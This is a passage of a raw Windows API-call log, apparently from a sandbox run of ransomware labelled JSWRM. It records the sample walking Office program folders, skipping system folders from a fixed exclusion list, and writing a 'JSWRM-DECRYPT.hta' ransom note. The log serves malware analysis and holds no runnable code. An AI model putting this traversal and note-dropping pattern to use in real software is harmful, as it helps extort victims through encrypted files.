Flags=0x0, Size=0x20) returned 0x240fe8 [0143.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rtmmvrsplitter.dll", cchWideChar=18, lpMultiByteStr=0x240fe8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Rtmmvrsplitter.dll", lpUsedDefaultChar=0x0) returned 18 [0143.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0143.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0143.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0143.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0143.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0143.845] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd7d90de, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xdee341d6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xdf2866d8, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1584a8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Rtmpal.dll", cAlternateFileName="")) returned 1 [0143.845] lstrcmpiW (lpString1="Rtmpal.dll", lpString2=".") returned 1 [0143.846] lstrcmpiW (lpString1="Rtmpal.dll", lpString2="..") returned 1 [0143.846] lstrcmpiW (lpString1="Rtmpal.dll", lpString2="...") returned 1 [0143.846] lstrcmpiW (lpString1="Rtmpal.dll", lpString2="windows") returned -1 [0143.846] lstrcmpiW (lpString1="Rtmpal.dll", lpString2="recovery") returned 1 [0143.846] lstrcmpiW (lpString1="Rtmpal.dll", lpString2="perflogs") returned 1 [0143.846] lstrcmpiW (lpString1="Rtmpal.dll", lpString2="documents and settings") returned 1 [0143.846] lstrcmpiW (lpString1="Rtmpal.dll", lpString2="$RECYCLE.BIN") returned 1 [0143.846] lstrcmpiW (lpString1="Rtmpal.dll", lpString2="system volume information") returned -1 [0143.846] lstrcmpiW (lpString1="Rtmpal.dll", lpString2="msocache") returned 1 [0143.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0143.846] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rtmpal.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0143.846] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rtmpal.dll", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Rtmpal.dll", lpUsedDefaultChar=0x0) returned 10 [0143.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0143.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0143.846] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rtmpal.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0143.846] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rtmpal.dll", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Rtmpal.dll", lpUsedDefaultChar=0x0) returned 10 [0143.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0143.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0143.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0143.846] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd8bdf22, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcd8bdf22, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xdf2866d8, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8582b0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="RTMPLTFM.dll", cAlternateFileName="")) returned 1 [0143.846] lstrcmpiW (lpString1="RTMPLTFM.dll", lpString2=".") returned 1 [0143.846] lstrcmpiW (lpString1="RTMPLTFM.dll", lpString2="..") returned 1 [0143.846] lstrcmpiW (lpString1="RTMPLTFM.dll", lpString2="...") returned 1 [0143.846] lstrcmpiW (lpString1="RTMPLTFM.dll", lpString2="windows") returned -1 [0143.846] lstrcmpiW (lpString1="RTMPLTFM.dll", lpString2="recovery") returned 1 [0143.846] lstrcmpiW (lpString1="RTMPLTFM.dll", lpString2="perflogs") returned 1 [0143.846] lstrcmpiW (lpString1="RTMPLTFM.dll", lpString2="documents and settings") returned 1 [0143.846] lstrcmpiW (lpString1="RTMPLTFM.dll", lpString2="$RECYCLE.BIN") returned 1 [0143.846] lstrcmpiW (lpString1="RTMPLTFM.dll", lpString2="system volume information") returned -1 [0143.846] lstrcmpiW (lpString1="RTMPLTFM.dll", lpString2="msocache") returned 1 [0143.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0143.846] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RTMPLTFM.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.846] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RTMPLTFM.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RTMPLTFM.dll", lpUsedDefaultChar=0x0) returned 12 [0143.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0143.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0143.846] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RTMPLTFM.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.847] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RTMPLTFM.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RTMPLTFM.dll", lpUsedDefaultChar=0x0) returned 12 [0143.847] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0143.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0143.847] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0143.847] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xede1d373, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xede1d373, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x23572815, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x568c0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="rtmvc1decmft.dll", cAlternateFileName="RTMVC1~1.DLL")) returned 1 [0143.847] lstrcmpiW (lpString1="rtmvc1decmft.dll", lpString2=".") returned 1 [0143.847] lstrcmpiW (lpString1="rtmvc1decmft.dll", lpString2="..") returned 1 [0143.847] lstrcmpiW (lpString1="rtmvc1decmft.dll", lpString2="...") returned 1 [0143.847] lstrcmpiW (lpString1="rtmvc1decmft.dll", lpString2="windows") returned -1 [0143.847] lstrcmpiW (lpString1="rtmvc1decmft.dll", lpString2="recovery") returned 1 [0143.847] lstrcmpiW (lpString1="rtmvc1decmft.dll", lpString2="perflogs") returned 1 [0143.847] lstrcmpiW (lpString1="rtmvc1decmft.dll", lpString2="documents and settings") returned 1 [0143.847] lstrcmpiW (lpString1="rtmvc1decmft.dll", lpString2="$RECYCLE.BIN") returned 1 [0143.847] lstrcmpiW (lpString1="rtmvc1decmft.dll", lpString2="system volume information") returned -1 [0143.847] lstrcmpiW (lpString1="rtmvc1decmft.dll", lpString2="msocache") returned 1 [0143.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0143.847] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rtmvc1decmft.dll", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0143.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0143.847] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rtmvc1decmft.dll", cchWideChar=16, lpMultiByteStr=0x240f70, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rtmvc1decmft.dll", lpUsedDefaultChar=0x0) returned 16 [0143.847] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0143.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0143.847] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rtmvc1decmft.dll", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0143.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0143.847] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rtmvc1decmft.dll", cchWideChar=16, lpMultiByteStr=0x2411f0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rtmvc1decmft.dll", lpUsedDefaultChar=0x0) returned 16 [0143.847] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0143.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0143.847] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0143.847] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0143.847] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0143.847] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xede1d373, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xede1d373, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x23598a6d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4a860, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="SAEXT.DLL", cAlternateFileName="")) returned 1 [0143.847] lstrcmpiW (lpString1="SAEXT.DLL", lpString2=".") returned 1 [0143.847] lstrcmpiW (lpString1="SAEXT.DLL", lpString2="..") returned 1 [0143.847] lstrcmpiW (lpString1="SAEXT.DLL", lpString2="...") returned 1 [0143.847] lstrcmpiW (lpString1="SAEXT.DLL", lpString2="windows") returned -1 [0143.847] lstrcmpiW (lpString1="SAEXT.DLL", lpString2="recovery") returned 1 [0143.848] lstrcmpiW (lpString1="SAEXT.DLL", lpString2="perflogs") returned 1 [0143.848] lstrcmpiW (lpString1="SAEXT.DLL", lpString2="documents and settings") returned 1 [0143.848] lstrcmpiW (lpString1="SAEXT.DLL", lpString2="$RECYCLE.BIN") returned 1 [0143.848] lstrcmpiW (lpString1="SAEXT.DLL", lpString2="system volume information") returned -1 [0143.848] lstrcmpiW (lpString1="SAEXT.DLL", lpString2="msocache") returned 1 [0143.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0143.848] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SAEXT.DLL", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0143.848] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SAEXT.DLL", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SAEXT.DLL", lpUsedDefaultChar=0x0) returned 9 [0143.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0143.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0143.848] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SAEXT.DLL", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0143.848] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SAEXT.DLL", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SAEXT.DLL", lpUsedDefaultChar=0x0) returned 9 [0143.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0143.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0143.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0143.848] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda173cc, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xb48c20e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="SAMPLES", cAlternateFileName="")) returned 1 [0143.848] lstrcmpiW (lpString1="SAMPLES", lpString2=".") returned 1 [0143.848] lstrcmpiW (lpString1="SAMPLES", lpString2="..") returned 1 [0143.848] lstrcmpiW (lpString1="SAMPLES", lpString2="...") returned 1 [0143.848] lstrcmpiW (lpString1="SAMPLES", lpString2="windows") returned -1 [0143.848] lstrcmpiW (lpString1="SAMPLES", lpString2="recovery") returned 1 [0143.848] lstrcmpiW (lpString1="SAMPLES", lpString2="perflogs") returned 1 [0143.848] lstrcmpiW (lpString1="SAMPLES", lpString2="documents and settings") returned 1 [0143.848] lstrcmpiW (lpString1="SAMPLES", lpString2="$RECYCLE.BIN") returned 1 [0143.848] lstrcmpiW (lpString1="SAMPLES", lpString2="system volume information") returned -1 [0143.848] lstrcmpiW (lpString1="SAMPLES", lpString2="msocache") returned 1 [0143.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0143.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x216e30 [0143.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0143.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0143.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0143.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225878 [0143.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24b1f0 [0143.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225878 | out: hHeap=0x1e0000) returned 1 [0143.848] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\SAMPLES\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\samples\\jswrm-decrypt.hta")) returned 0xffffffff [0143.849] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0143.849] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.849] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.849] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0143.849] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x27b348 [0143.849] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0143.849] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x27d118 [0143.849] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0143.849] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2256e0 [0143.849] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24b2b8 [0143.849] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2256e0 | out: hHeap=0x1e0000) returned 1 [0143.849] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\SAMPLES\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\samples\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0143.850] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.850] WriteFile (in: hFile=0x45c, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0143.851] CloseHandle (hObject=0x45c) returned 1 [0143.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0143.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27d118 | out: hHeap=0x1e0000) returned 1 [0143.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0143.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0143.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224b30 [0143.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2256e0 [0143.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0143.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24be70 [0143.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0143.853] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\SAMPLES\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\samples\\jswrm-decrypt.hta")) returned 0x20 [0143.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0143.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2256e0 | out: hHeap=0x1e0000) returned 1 [0143.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224ee8 [0143.853] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\SAMPLES\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xb48c20e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4c65e4a0, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x232180 [0143.853] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0143.853] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xb48c20e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4c65e4a0, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0143.853] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0143.853] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0143.853] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c65e4a0, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4c65e4a0, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4c684968, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0143.853] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0143.853] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0143.853] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0143.853] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0143.853] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0143.854] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0143.854] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0143.854] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0143.854] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0143.854] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0143.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0143.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0143.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0143.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411f0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0143.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0143.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0143.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0143.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0143.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0143.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0143.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0143.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224ee8 | out: hHeap=0x1e0000) returned 1 [0143.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0143.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0143.854] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xb48c20e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xb48c20e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb48c20e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1d000, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="SOLVSAMP.XLS", cAlternateFileName="")) returned 1 [0143.854] lstrcmpiW (lpString1="SOLVSAMP.XLS", lpString2=".") returned 1 [0143.854] lstrcmpiW (lpString1="SOLVSAMP.XLS", lpString2="..") returned 1 [0143.854] lstrcmpiW (lpString1="SOLVSAMP.XLS", lpString2="...") returned 1 [0143.854] lstrcmpiW (lpString1="SOLVSAMP.XLS", 